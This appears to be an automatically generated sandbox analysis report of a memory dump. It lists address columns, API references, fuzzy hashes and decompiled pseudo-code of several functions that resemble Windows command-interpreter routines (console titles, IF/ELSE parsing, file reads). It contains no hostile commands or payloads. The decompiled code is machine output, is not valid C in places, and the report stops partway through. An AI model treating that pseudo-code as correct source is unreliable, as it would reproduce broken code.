                                0x4a55dfb9
                                0x4a55dfbb
                                0x4a55dfbb
                                0x4a55dfbe
                                0x4a55dfbe
                                0x4a55dfc2
                                0x4a55dfc3
                                0x4a55dfcc
                                0x4a55dfce
                                0x00000000
                                0x4a55dfce
                                0x4a55f8d4
                                0x4a55f8d9
                                0x4a55f8ec
                                0x4a55f8f4
                                0x4a55f8fa
                                0x4a55f903
                                0x4a55f906
                                0x4a55f914
                                0x4a55f917
                                0x4a55f91c
                                0x4a55f924
                                0x4a55f92a
                                0x4a55f92d
                                0x00000000
                                0x4a564be8
                                0x4a564be8
                                0x4a564beb
                                0x4a564bee
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564bf4
                                0x4a55f8bf
                                0x4a55df8b
                                0x4a55df8d
                                0x4a55e442
                                0x4a55e444
                                0x4a564bf9
                                0x4a564bfc
                                0x4a564bfe
                                0x4a564c00
                                0x4a564c00
                                0x4a564c06
                                0x4a564c15
                                0x4a564c18
                                0x4a564c1a
                                0x4a564c1d
                                0x4a564c1f
                                0x4a564c8f
                                0x4a564c94
                                0x4a564c9b
                                0x4a564ca3
                                0x4a564c21
                                0x4a564c26
                                0x4a564c2b
                                0x4a564c2e
                                0x4a564c30
                                0x4a564c46
                                0x4a564c48
                                0x4a564c4a
                                0x00000000
                                0x00000000
                                0x4a564c4c
                                0x4a564c4f
                                0x4a564c51
                                0x00000000
                                0x00000000
                                0x4a564c56
                                0x4a564c5b
                                0x4a564c5f
                                0x4a564c66
                                0x4a564c6b
                                0x4a564c6b
                                0x4a564c85
                                0x4a55df9d
                                0x4a55df9d
                                0x00000000
                                0x4a55df9d
                                0x4a564c32
                                0x4a564c32
                                0x00000000
                                0x4a564c1f
                                0x4a55e45d
                                0x00000000
                                0x4a55e45d
                                0x4a55df98
                                0x00000000
                                0x4a55df98
                                0x4a55df0a
                                0x4a55df0c
                                0x4a55df0c
                                0x4a55df0f
                                0x4a55df0f
                                0x4a55df13
                                0x4a55df14
                                0x4a55df1f
                                0x4a55df25
                                0x4a55df2d
                                0x4a55df40
                                0x4a55df47
                                0x00000000

                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID:
                                • API String ID: 1617791916-0
                                • Opcode ID: 1bfa69e3a6f630eee492ee56110b284d2324d1a653c567985c46e4d849f86b9d
                                • Instruction ID: 70f450c43dfba2bbe0b8a416c6002746aa159b63f94609c043c238e9ffa54f0a
                                • Opcode Fuzzy Hash: 1bfa69e3a6f630eee492ee56110b284d2324d1a653c567985c46e4d849f86b9d
                                • Instruction Fuzzy Hash: 74913CB2900249EFDB11EFE4CE849AEBBBAFF85304B11442AE105EF61DD7319946CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55216E, Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                Download Yara Rule
                                C-Code - Quality: 71%
                                			E4A55216E(void* __ebx, void* __edi, signed short __esi, void* __eflags) {
				void* _t39;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t64;
				void* _t67;

				_t66 = __esi;
				_t65 = __edi;
				_push(0x430);
				_push(0x4a552280);
				E4A5513E1(__ebx, __edi, __esi);
				_t58 =  *((intOrPtr*)(_t67 + 8));
				GetConsoleTitleW(_t67 - 0x430, 0x104);
				_t3 = _t58 + 0x38; // 0x0
				_t34 =  *_t3;
				if( *_t3 == 0) {
					L36:
					goto L7;
				} else {
					__eflags =  *((short*)(__eax + 2)) - 0x3a;
					if( *((short*)(__eax + 2)) == 0x3a) {
						goto L1;
					}
					__eax = __ebp - 0x434;
					__edi = E4A5541DD(__ebx, __ebp - 0x434);
					 *(__ebp - 0x43c) = __edi;
					__eflags = __edi - 0xffffffff;
					if(__edi == 0xffffffff) {
						L6:
						E4A553D05(_t58);
						L7:
						return E4A5513CA(_t58, _t65, _t66);
					}
					__eax = E4A554165(__edi);
					 *(__ebp - 0x438) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						L35:
						goto L7;
					}
					__ax =  *0x4a59065c; // 0x2f
					 *(__ebp - 0x224) = __ax;
					__eax = 0;
					 *((short*)(__ebp - 0x222)) = __ax;
					__eax = __ebp - 0x224;
					_t15 = __ebx + 0x3c; // 0x0
					__esi = E4A5522CA( *_t15, __ebp - 0x224, 2);
					__eflags = __edi - 0xa;
					if(__edi == 0xa) {
						__eflags = __esi;
						if(__esi == 0) {
							goto L12;
						}
						__eax = wcsncmp(__esi, E4A555B40, 4);
						__eflags = __eax;
						if(__eax != 0) {
							while(1) {
								L14:
								__eflags = __esi;
								if(__esi == 0) {
									break;
								}
								__eflags =  *__esi;
								if( *__esi == 0) {
									break;
								}
								__eax = __esi;
								_t16 = __eax + 2; // 0x2
								__edx = _t16;
								do {
									__cx =  *__eax;
									__eax = __eax + 1;
									__eax = __eax + 1;
									__eflags = __cx;
								} while (__cx != 0);
								__eax = __eax - __edx;
								__edi = __eax;
								__eax = E4A552598(__ecx, __esi);
								__edi = __edi + 1;
								__eax = E4A55185A(__esi, __edi, __eax);
								__eflags =  *(__ebp - 0x434) & 0x00000001;
								if(( *(__ebp - 0x434) & 0x00000001) != 0) {
									__eflags = __esi[0] - 0x3a;
									if(__esi[0] != 0x3a) {
										goto L19;
									}
									__eax =  *__esi & 0x0000ffff;
									__eax = E4A552B68( *__esi & 0x0000ffff);
									__eflags = __eax;
									if(__eax == 0) {
										_push(0);
										_push(0xf);
										L41:
										__eax = E4A556D44(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										0 = 1;
										 *0x4a574188 = 1;
										goto L7;
									}
									__eflags =  *(__ebp - 0x43c) - 4;
									if( *(__ebp - 0x43c) == 4) {
										goto L19;
									}
									__eax =  *__esi & 0x0000ffff;
									__eax = E4A55395E( *__esi & 0x0000ffff);
									__eflags = __eax;
									if(__eax == 0) {
										goto L19;
									}
									_push(0);
									_push(GetLastError());
									goto L41;
								}
								L19:
								__eflags =  *(__ebp - 0x434) & 0x00000002;
								if(( *(__ebp - 0x434) & 0x00000002) != 0) {
									__eflags =  *__esi -  *0x4a59065c; // 0x2f
									if(__eflags != 0) {
										goto L20;
									}
									_push(0);
									_push(0x232a);
									goto L41;
								}
								L20:
								__esi = E4A55413B(__esi);
							}
							__eax = E4A55246C(__ebx);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E4A5524ED(__eax, __ecx, __eax);
							}
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							 *((intOrPtr*)(__ebp - 0x440)) =  *(__ebp - 0x438)(__ebx);
							 *(__ebp - 4) = 0xfffffffe;
							E4A5543A7() =  *((intOrPtr*)(__ebp - 0x440));
							goto L7;
						}
					}
					L12:
					__eflags = __edi - 0x1f;
					if(__edi == 0x1f) {
						goto L14;
					}
					__eax = E4A55446E(__edi, __esi);
					__eflags = __al;
					if(__al != 0) {
						goto L36;
					}
					goto L14;
				}
				L1:
				_t39 = E4A552B68( *_t34 & 0x0000ffff);
				if(_t39 == 0) {
					_push(_t39);
					_push(0xf);
					L38:
					E4A556D44(_t59);
					goto L36;
				}
				_t4 = _t58 + 0x38; // 0x0
				if(E4A55395E( *( *_t4) & 0x0000ffff) != 0) {
					_push(0);
					_push(GetLastError());
					goto L38;
				}
				_t5 = _t58 + 0x38; // 0x0
				_t66 = towupper( *( *_t5) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
				_t6 = _t58 + 0x38; // 0x0
				_t49 =  *_t6;
				_t7 = _t49 + 2; // 0x2
				_t64 = _t7;
				do {
					_t63 =  *_t49;
					_t49 = _t49 + 2;
				} while (_t63 != 0);
				if(_t49 - _t64 >> 1 == 2) {
					E4A5600DD(_t64, _t66 & 0x0000ffff);
					goto L35;
				}
				goto L6;
			}










                                0x4a55216e
                                0x4a55216e
                                0x4a55216e
                                0x4a552173
                                0x4a552178
                                0x4a55217d
                                0x4a55218c
                                0x4a552192
                                0x4a552192
                                0x4a552197
                                0x4a560f69
                                0x00000000
                                0x4a55219d
                                0x4a55219d
                                0x4a5521a2
                                0x00000000
                                0x00000000
                                0x4a5521a8
                                0x4a5521b5
                                0x4a5521b7
                                0x4a5521bd
                                0x4a5521c0
                                0x4a5515bf
                                0x4a5515c0
                                0x4a5515c5
                                0x4a5515ca
                                0x4a5515ca
                                0x4a5521c7
                                0x4a5521cc
                                0x4a5521d2
                                0x4a5521d4
                                0x4a560f62
                                0x00000000
                                0x4a560f62
                                0x4a5521da
                                0x4a5521e0
                                0x4a5521e7
                                0x4a5521e9
                                0x4a5521f2
                                0x4a5521f9
                                0x4a552201
                                0x4a552203
                                0x4a552206
                                0x4a555b1a
                                0x4a555b1c
                                0x00000000
                                0x00000000
                                0x4a555b2a
                                0x4a555b33
                                0x4a555b35
                                0x4a552220
                                0x4a552220
                                0x4a552220
                                0x4a552222
                                0x00000000
                                0x00000000
                                0x4a552228
                                0x4a55222c
                                0x00000000
                                0x00000000
                                0x4a552232
                                0x4a552234
                                0x4a552234
                                0x4a552237
                                0x4a552237
                                0x4a55223a
                                0x4a55223b
                                0x4a55223c
                                0x4a55223c
                                0x4a552241
                                0x4a552245
                                0x4a552248
                                0x4a55224e
                                0x4a552251
                                0x4a552256
                                0x4a55225d
                                0x4a559966
                                0x4a55996b
                                0x00000000
                                0x00000000
                                0x4a559971
                                0x4a559975
                                0x4a55997a
                                0x4a55997c
                                0x4a5671f3
                                0x4a5671f5
                                0x4a5671f7
                                0x4a5671f7
                                0x4a5671fc
                                0x4a5671fd
                                0x4a567200
                                0x4a567201
                                0x00000000
                                0x4a567201
                                0x4a559982
                                0x4a559989
                                0x00000000
                                0x00000000
                                0x4a55998f
                                0x4a559993
                                0x4a559998
                                0x4a55999a
                                0x00000000
                                0x00000000
                                0x4a56720b
                                0x4a567213
                                0x00000000
                                0x4a567213
                                0x4a552263
                                0x4a552263
                                0x4a55226a
                                0x4a555658
                                0x4a55565f
                                0x00000000
                                0x00000000
                                0x4a567216
                                0x4a567218
                                0x00000000
                                0x4a567218
                                0x4a552270
                                0x4a552276
                                0x4a552276
                                0x4a55436b
                                0x4a554370
                                0x4a554372
                                0x4a554375
                                0x4a554375
                                0x4a55437a
                                0x4a554385
                                0x4a55438b
                                0x4a554397
                                0x00000000
                                0x4a554397
                                0x4a555b3b
                                0x4a55220c
                                0x4a55220c
                                0x4a55220f
                                0x00000000
                                0x00000000
                                0x4a552213
                                0x4a552218
                                0x4a55221a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55221a
                                0x4a551568
                                0x4a55156c
                                0x4a551573
                                0x4a5671d9
                                0x4a5671da
                                0x4a5671dc
                                0x4a5671dc
                                0x00000000
                                0x4a5671e2
                                0x4a551579
                                0x4a551587
                                0x4a5671e8
                                0x4a5671f0
                                0x00000000
                                0x4a5671f0
                                0x4a55158d
                                0x4a55159f
                                0x4a5515a2
                                0x4a5515a2
                                0x4a5515a5
                                0x4a5515a5
                                0x4a5515a8
                                0x4a5515a8
                                0x4a5515ac
                                0x4a5515ad
                                0x4a5515b9
                                0x4a560f5d
                                0x00000000
                                0x4a560f5d
                                0x00000000

                                APIs
                                • towupper.MSVCRT ref: 4A551594
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • GetConsoleTitleW.KERNEL32 ref: 4A55218C
                                • wcsncmp.MSVCRT(00000000,4A555B40,00000004,00000000,?,00000002,00000000,4A574210,?,?,4A55745B,-00000003,00000000,00000000,00000000,00000000), ref: 4A555B2A
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleTitleiswspacetowupperwcsncmp
                                • String ID:
                                • API String ID: 4235436829-0
                                • Opcode ID: 3390819bbe3ff5e435cd663d05f11a506277009870a258c5ff3adaae9edaceba
                                • Instruction ID: 875f837d0a7e8c47e54920ddb4269e352245a6010907afa5f22a1806a6e3ad5b
                                • Opcode Fuzzy Hash: 3390819bbe3ff5e435cd663d05f11a506277009870a258c5ff3adaae9edaceba
                                • Instruction Fuzzy Hash: 8B51F6B5911212AAD7217B60DF48B6E3ABCEF85714F014857F946EF08DEB30DA81CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55C2F7, Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E4A55C2F7(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v528;
				WCHAR* _v532;
				wchar_t* _v536;
				signed int _v540;
				signed int _v544;
				wchar_t* _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr* _t51;
				intOrPtr* _t55;
				signed int _t58;
				WCHAR* _t59;
				wchar_t* _t64;
				wchar_t* _t67;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;

				_t72 = __ecx;
				_t41 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t41 ^ _t83;
				_t80 = _a4;
				_t81 = 0;
				_v548 = 0;
				_v536 = 0;
				if(E4A55C44E(__ecx,  &_v552) != 0 || _v552 == 0) {
					if(_t80 == _t81) {
						_v532 = _t81;
						goto L10;
					}
					_t27 = _t80 + 0x3c; // 0x0
					_t51 = E4A552B0D( *_t27, _t81);
					_v532 = _t51;
					if(_t51 == _t81) {
						goto L12;
					}
					_t29 = _t51 + 2; // 0x2
					_t79 = _t29;
					do {
						_t72 =  *_t51;
						_t51 = _t51 + 2;
					} while (_t72 != _t81);
					if(_t51 - _t79 >> 1 < 0x104) {
						goto L10;
					}
					_v540 = 1;
					goto L35;
				} else {
					_t70 = 1;
					_v540 = 1;
					_t55 = E4A55C56B(__ecx);
					_t72 = 0x40002748;
					_v536 = _t55;
					if(_t55 == 0) {
						L35:
						_push(_t81);
						_push(8);
						E4A556D44(_t72);
						L18:
						return E4A5513A9(_v540, _t70, _v8 ^ _t83, _t79, _t80, _t81);
					}
					_t9 = _t55 + 2; // 0x2
					_t79 = _t9;
					do {
						_t72 =  *_t55;
						_t55 = _t55 + 2;
					} while (_t72 != 0);
					_t58 = _t55 - _t79 >> 1;
					_v544 = _t58;
					if(_t58 >= 0x104) {
						L15:
						_t81 = 0;
						if(_v536 != 0) {
							LocalFree(_v536);
						}
						if(_v540 != _t81) {
							goto L35;
						} else {
							goto L18;
						}
					}
					_t59 = E4A551896(0x208);
					_v532 = _t59;
					if(_t59 == 0) {
						goto L15;
					}
					_v548 = 1;
					E4A55185A(_t59, 0x104, _v536);
					if(_t80 == 0) {
						_t70 =  &_v528;
						if(GetConsoleTitleW(_t70, 0x104) == 0) {
							L13:
							if(_v532 != 0) {
								E4A55142E(_v532);
							}
							goto L15;
						}
						_t80 = wcsstr;
						_t64 = wcsstr(_t70, _v536);
						_pop(_t72);
						if(_t64 != 0) {
							_v544 = _v544 + _v544;
							while(1) {
								_t70 = _t70 + _v544;
								_t67 = wcsstr(_t70, _v536);
								_pop(_t72);
								if(_t67 == 0) {
									goto L27;
								}
							}
						}
						L27:
						if(E4A5520A9(0x104, _v532, 0x104, _t70) == 0) {
							L10:
							_t81 = 0;
							if(_v532 != 0) {
								SetConsoleTitleW(_v532);
								 *0x4a574083 = 0;
							}
							L12:
							_v540 = _t81;
							if(_v548 == _t81) {
								goto L15;
							}
							goto L13;
						}
						goto L13;
					}
					_t14 = _t80 + 0x3c; // 0x0
					_t80 =  *_t14;
					if(_t80 == 0) {
						_v540 = _v540 & _t80;
						goto L13;
					}
					if(E4A5520A9(0x104, _v532, 0x104, _t80) != 0) {
						goto L13;
					}
					goto L10;
				}
			}

























                                0x4a55c2f7
                                0x4a55c302
                                0x4a55c309
                                0x4a55c30f
                                0x4a55c318
                                0x4a55c31b
                                0x4a55c321
                                0x4a55c32e
                                0x4a560618
                                0x4a563420
                                0x00000000
                                0x4a563420
                                0x4a56061f
                                0x4a560622
                                0x4a560627
                                0x4a56062f
                                0x00000000
                                0x00000000
                                0x4a560635
                                0x4a560635
                                0x4a560638
                                0x4a560638
                                0x4a56063c
                                0x4a56063d
                                0x4a56064b
                                0x00000000
                                0x00000000
                                0x4a565d92
                                0x00000000
                                0x4a55c340
                                0x4a55c342
                                0x4a55c348
                                0x4a55c34e
                                0x4a55c353
                                0x4a55c354
                                0x4a55c35c
                                0x4a565d9c
                                0x4a565d9c
                                0x4a565d9d
                                0x4a565d9f
                                0x4a55c432
                                0x4a55c446
                                0x4a55c446
                                0x4a55c362
                                0x4a55c362
                                0x4a55c365
                                0x4a55c365
                                0x4a55c369
                                0x4a55c36a
                                0x4a55c371
                                0x4a55c378
                                0x4a55c380
                                0x4a55c410
                                0x4a55c410
                                0x4a55c418
                                0x4a55c420
                                0x4a55c420
                                0x4a55c42c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c42c
                                0x4a55c38b
                                0x4a55c390
                                0x4a55c398
                                0x00000000
                                0x00000000
                                0x4a55c3a0
                                0x4a55c3a8
                                0x4a55c3af
                                0x4a5633d3
                                0x4a5633e5
                                0x4a55c3fc
                                0x4a55c403
                                0x4a55c40b
                                0x4a55c40b
                                0x00000000
                                0x4a55c403
                                0x4a5633f1
                                0x4a5633fa
                                0x4a5633fd
                                0x4a563400
                                0x4a565d66
                                0x4a565d6c
                                0x4a565d6c
                                0x4a565d79
                                0x4a565d7c
                                0x4a565d7f
                                0x00000000
                                0x00000000
                                0x4a565d85
                                0x4a565d6c
                                0x4a563406
                                0x4a563415
                                0x4a55c3d1
                                0x4a55c3d1
                                0x4a55c3d9
                                0x4a55c3e1
                                0x4a55c3e7
                                0x4a55c3e7
                                0x4a55c3ee
                                0x4a55c3ee
                                0x4a55c3fa
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c3fa
                                0x00000000
                                0x4a56341b
                                0x4a55c3b5
                                0x4a55c3b5
                                0x4a55c3ba
                                0x4a565d87
                                0x00000000
                                0x4a565d87
                                0x4a55c3cf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55c3cf

                                APIs
                                  • Part of subcall function 4A55C56B: FormatMessageW.KERNEL32(00001900,00000000,766F5129,00000000,00000000,00000000,766F5129,?,?,?,4A55C353,40002748,?,-00000003,766F5129,00000000), ref: 4A55C590
                                • SetConsoleTitleW.KERNEL32(?), ref: 4A55C3E1
                                • LocalFree.KERNEL32(?,00000000,00000000,?,-00000003,766F5129,00000000), ref: 4A55C420
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleFormatFreeLocalMessageTitle
                                • String ID:
                                • API String ID: 3649520976-0
                                • Opcode ID: 9ae93fb24bb15b83f99c734f3cf04e73ad91d1ec4882af4dd4eabd4e70fcc9c3
                                • Instruction ID: ec29b1184b99a06c866da3b6187783b62c1412a06890f41780640fd2cda75353
                                • Opcode Fuzzy Hash: 9ae93fb24bb15b83f99c734f3cf04e73ad91d1ec4882af4dd4eabd4e70fcc9c3
                                • Instruction Fuzzy Hash: 5751B57098122DABDB21AB24DE887EEBBB4FF54755F1105E6D009E6168D7708EC0CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5610A5, Relevance: 7.6, APIs: 5, Instructions: 96fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E4A5610A5(void* __eax, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, WCHAR* _a28) {
				char _v8;
				void* __ecx;
				int _t22;
				void* _t25;
				signed int _t33;
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t40;
				void* _t45;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t52;
				void* _t58;
				intOrPtr* _t59;

				_t59 = _a16;
				_v8 = 0;
				 *0x4a574120 = 0;
				__imp___get_osfhandle(_a4, _a8, _a12, _t59, 0, _t52, _t58, _t39, _t45);
				_pop(_t46);
				_t22 = ReadFile(__eax, ??, ??, ??, ??);
				_t40 = GetLastError;
				if(_t22 == 0) {
					L17:
					 *0x4a574128 = GetLastError();
					_t25 = E4A553B03(E4A553AB3(_a4), _t46, _a24);
					_push(_a24);
					if(_t25 != 0) {
						E4A553AB3();
					} else {
						E4A553AB3();
						DeleteFileW(_a28);
					}
					L4A56F2D7(_t46,  *0x4a574128, 1);
					asm("int3");
					E4A55185A(_a8, _t40, 0);
					return _v8;
				} else {
					_t50 =  *_t59;
					if(_t50 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L17;
						} else {
							_t50 =  *_t59;
							if(_t50 != 0) {
								goto L2;
							} else {
								 *0x4a574128 = 0;
								_t37 = 0;
							}
							goto L9;
						}
					} else {
						L2:
						_t47 = _a20;
						_t33 =  *(_t47 + 0x1c);
						if((_t33 & 0x0000c000) == 0) {
							if(_t50 < 2 ||  *_a8 != 0xfeff) {
								_t38 = _t33 | 0x00008000;
							} else {
								_t38 = _t33 | 0x00004000;
							}
							 *(_t47 + 0x1c) = _t38;
						}
						if(( *(_t47 + 0x1c) & 0x00008002) == 0x8002) {
							E4A56E4DC(1, _a8, _t59,  &_v8);
							if( *_t59 !=  *_t59) {
								 *0x4a574120 = 1;
							}
						}
						_t37 = 1;
						L9:
						return _t37;
					}
				}
			}



















                                0x4a5610ad
                                0x4a5610b8
                                0x4a5610be
                                0x4a5610c7
                                0x4a5610cd
                                0x4a5610cf
                                0x4a5610d5
                                0x4a5610dd
                                0x4a568796
                                0x4a56879b
                                0x4a5687a8
                                0x4a5687ad
                                0x4a5687b2
                                0x4a5687c4
                                0x4a5687b4
                                0x4a5687b4
                                0x4a5687bc
                                0x4a5687bc
                                0x4a5687d1
                                0x4a5687d6
                                0x4a5687dc
                                0x4a5611d8
                                0x4a5610e3
                                0x4a5610e3
                                0x4a5610e7
                                0x4a568750
                                0x00000000
                                0x4a568752
                                0x4a568752
                                0x4a568756
                                0x00000000
                                0x4a56875c
                                0x4a56875c
                                0x4a568762
                                0x4a568762
                                0x00000000
                                0x4a568756
                                0x4a5610ed
                                0x4a5610ed
                                0x4a5610ed
                                0x4a5610f0
                                0x4a5610f8
                                0x4a5610fd
                                0x4a561110
                                0x4a568769
                                0x4a568769
                                0x4a568769
                                0x4a561115
                                0x4a561115
                                0x4a561127
                                0x4a56877e
                                0x4a568785
                                0x4a56878b
                                0x4a56878b
                                0x4a568785
                                0x4a56112d
                                0x4a56112f
                                0x4a561133
                                0x4a561133
                                0x4a5610e7

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                • String ID:
                                • API String ID: 3588551418-0
                                • Opcode ID: 500498be76a6a989c848f0a86b4abc3307e335bce873722dc5eee9dbc7be2e75
                                • Instruction ID: 0bc99074010afcece6dec7287ffefaa6f093ed7fc618cefa65bbd8d3bd155152
                                • Opcode Fuzzy Hash: 500498be76a6a989c848f0a86b4abc3307e335bce873722dc5eee9dbc7be2e75
                                • Instruction Fuzzy Hash: 3B31E074601145AFDF21AF61CB84D9A7F7AFF80364B20892AF909DB164CB31DD41CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556098, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 87COMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E4A556098(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				signed int _v0;
				signed int __ebx;
				void* __ebp;
				intOrPtr _t16;
				intOrPtr _t20;
				void* _t23;
				void* _t27;
				void* _t29;

				_t25 = __ecx;
				asm("das");
				 *_t25 =  *__ecx + __ecx;
				 *__eax =  *__eax + __eax;
				_pop(__edi);
				_pop(__esi);
				__ebp = __esp;
				__edi = 0x4a588640;
				__ebx = 0;
				__imp___wcsicmp(L"IF/?", __edi, __esi, __ebx, __ecx, __ebp);
				_pop(__ecx);
				__ecx = 0x4a588640;
				__eflags = __eax;
				if(__eax == 0) {
					__eax = 0x4a574610;
					_t10 = __eax + 2; // 0x4a574612
					__edx = _t10;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
						__eflags = __cx;
					} while (__cx != 0);
					__eax = __eax - __edx;
					__eax = __eax >> 1;
					__ecx = 0;
					__ebx = 0;
					 *((short*)(0x4a588640 + __eax * 2)) = __cx;
					__ebx = 1;
					goto L4;
				} else {
					L4:
					__esi = E4A5529E9(__ebx, __ecx, __edx, __edi, 0x2c);
					__eflags = __ebx;
					if(__eflags != 0) {
						__eax = 0x2f;
						 *0x4a588640 = __ax;
						__eax = 0x3f;
						 *0x4a588642 = __ax;
						__eax = 0;
						 *0x4a588644 = __ax;
					} else {
						__eax = E4A551CBF(__edi, 0);
					}
					__eax = E4A555228(__ebx, __edi, __esi, __eflags, __edi, 0x2c);
					__eflags = __al;
					if(__al != 0) {
						 *(__esi + 0x38) =  *(__esi + 0x38) & 0x00000000;
						 *__esi = 0x3c;
						goto L16;
					} else {
						__ebx = 0;
						_v0 = 0;
						__eflags =  *0x4a574081 - __bl; // 0x0
						if(__eflags == 0) {
							L9:
							__eax = E4A551D26(__eax, __ebx, __ebx, __ebx);
							L10:
							__eax = E4A55617F(__ecx, __edx, __edi, __ebx);
							 *(__esi + 0x3c) = __eax;
							__eflags = __eax - __ebx;
							if(__eax != __ebx) {
								__eflags = _v0 - __ebx;
								if(_v0 != __ebx) {
									__eflags =  *__eax - 0x38;
									if( *__eax == 0x38) {
										__eax =  *(__eax + 0x3c);
									}
									 *((intOrPtr*)(__eax + 0x40)) = 2;
								}
							}
							__eax = E4A551C59(__ebx, __edi, 0x2c);
							 *(__esi + 0x40) = __eax;
							__eflags = __eax - __ebx;
							if(__eax == __ebx) {
								__eax = E4A56EE72();
							}
							__eax = E4A5529D5();
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E4A551CBF(__edi, __ebx);
								__imp___wcsicmp(L"ELSE");
								_pop(__ecx);
								__ecx = __edi;
								__eflags = __eax;
								if(__eax == 0) {
									_t16 =  *0x4a574178; // 0x0
									 *((intOrPtr*)(_t29 + 0x44)) = E4A552041(_t16 + _t16);
									E4A55185A(_t18,  *0x4a574178, _t27);
									_t20 = E4A551C59(_t23, _t27, 0x2c);
									 *((intOrPtr*)(_t29 + 0x48)) = _t20;
									if(_t20 == _t23) {
										E4A56EE72();
									}
								} else {
									__eax = E4A551D26(__eax, __ebx, __ebx, __ebx);
								}
							}
							L16:
							return _t29;
						}
						__imp___wcsicmp(E4A556098);
						__ecx = __edi;
						_pop(__ecx);
						__eflags = __eax;
						if(__eax == 0) {
							_v0 = 1;
							goto L10;
						}
						goto L9;
					}
				}
			}











                                0x4a556098
                                0x4a556098
                                0x4a556099
                                0x4a55609c
                                0x4a55609e
                                0x4a55609f
                                0x4a5560a8
                                0x4a5560ae
                                0x4a5560b9
                                0x4a5560bb
                                0x4a5560c1
                                0x4a5560c2
                                0x4a5560c3
                                0x4a5560c5
                                0x4a567f7c
                                0x4a567f81
                                0x4a567f81
                                0x4a567f84
                                0x4a567f84
                                0x4a567f87
                                0x4a567f88
                                0x4a567f89
                                0x4a567f89
                                0x4a567f8e
                                0x4a567f90
                                0x4a567f92
                                0x4a567f94
                                0x4a567f96
                                0x4a567f9e
                                0x00000000
                                0x4a5560cb
                                0x4a5560cb
                                0x4a5560d2
                                0x4a5560d4
                                0x4a5560d6
                                0x4a567fa6
                                0x4a567fa7
                                0x4a567faf
                                0x4a567fb0
                                0x4a567fb6
                                0x4a567fb8
                                0x4a5560dc
                                0x4a5560de
                                0x4a5560de
                                0x4a5560e6
                                0x4a5560eb
                                0x4a5560ed
                                0x4a567fc3
                                0x4a567fc7
                                0x00000000
                                0x4a5560f3
                                0x4a5560f3
                                0x4a5560f5
                                0x4a5560f8
                                0x4a5560fe
                                0x4a556116
                                0x4a556119
                                0x4a55611e
                                0x4a55611f
                                0x4a556124
                                0x4a556127
                                0x4a556129
                                0x4a55612b
                                0x4a55612e
                                0x4a55db74
                                0x4a55db77
                                0x4a55fdf1
                                0x4a55fdf1
                                0x4a55db7d
                                0x4a55db7d
                                0x4a55612e
                                0x4a556136
                                0x4a55613b
                                0x4a55613e
                                0x4a556140
                                0x4a567fd2
                                0x4a567fd2
                                0x4a556146
                                0x4a55614b
                                0x4a55614d
                                0x4a556150
                                0x4a55615b
                                0x4a556161
                                0x4a556162
                                0x4a556163
                                0x4a556165
                                0x4a555857
                                0x4a555865
                                0x4a55586f
                                0x4a555876
                                0x4a55587b
                                0x4a555880
                                0x4a567fdc
                                0x4a567fdc
                                0x4a55616b
                                0x4a55616e
                                0x4a55616e
                                0x4a556165
                                0x4a556173
                                0x4a556179
                                0x4a556179
                                0x4a556106
                                0x4a55610c
                                0x4a55610d
                                0x4a55610e
                                0x4a556110
                                0x4a55db68
                                0x00000000
                                0x4a55db68
                                0x00000000
                                0x4a556110
                                0x4a5560ed

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
